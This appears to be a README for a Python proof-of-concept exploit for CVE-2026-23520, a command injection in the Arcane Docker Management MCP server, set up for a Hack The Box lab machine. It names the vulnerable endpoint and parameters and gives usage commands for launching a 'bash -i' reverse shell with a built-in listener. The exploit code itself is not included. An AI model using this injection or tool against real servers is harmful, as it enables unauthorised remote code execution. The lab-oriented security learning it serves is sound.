Share
## https://sploitus.com/exploit?id=59D72134-ACFA-5A08-A555-A3C9BB768612
# CVE-2026-23520-PoC
### Arcane MCP Command Injection (Kobold HTB)

A specialized Python Proof of Concept (PoC) for **CVE-2026-23520**, an unauthenticated Remote Code Execution (RCE) vulnerability in the **Arcane Docker Management** MCP server. This tool is designed for the **Kobold** machine on Hack The Box.

---

## ๐Ÿš€ Features
- **Auto-Version Check**: Probes the Arcane API on port 3552 to identify the version.
- **All-in-One Listener**: Multi-threaded internal listenerโ€”no need for a separate `nc` window.
- **PTY-Ready**: Uses a `bash -i` payload for an interactive shell experience.

---

## ๐Ÿ› ๏ธ Installation & Usage

### 1. Requirements
```bash
pip install requests
```

### 2. Basic Usage
Identify if the target is vulnerable before exploiting:
```bash
python3 kobold_poc.py -t https://mcp.kobold.htb -check
```

### 3. Exploitation (Reverse Shell)
Launch the exploit and catch the shell internally:
```bash
python3 kobold_poc.py -t https://mcp.kobold.htb -lh  -lp 1234
```

---

## ๐Ÿ“ Vulnerability Details
The vulnerability stems from the `/api/mcp/connect` endpoint, which allows arbitrary command execution via the `serverConfig.command` and `args` parameters.

- **CVE ID**: 2026-23520
- **Severity**: 9.8 (Critical)
- **Path**: `/api/mcp/connect`
---

## โš–๏ธ Disclaimer
This script is for educational purposes and authorized penetration testing only. Usage against targets without prior mutual consent is illegal.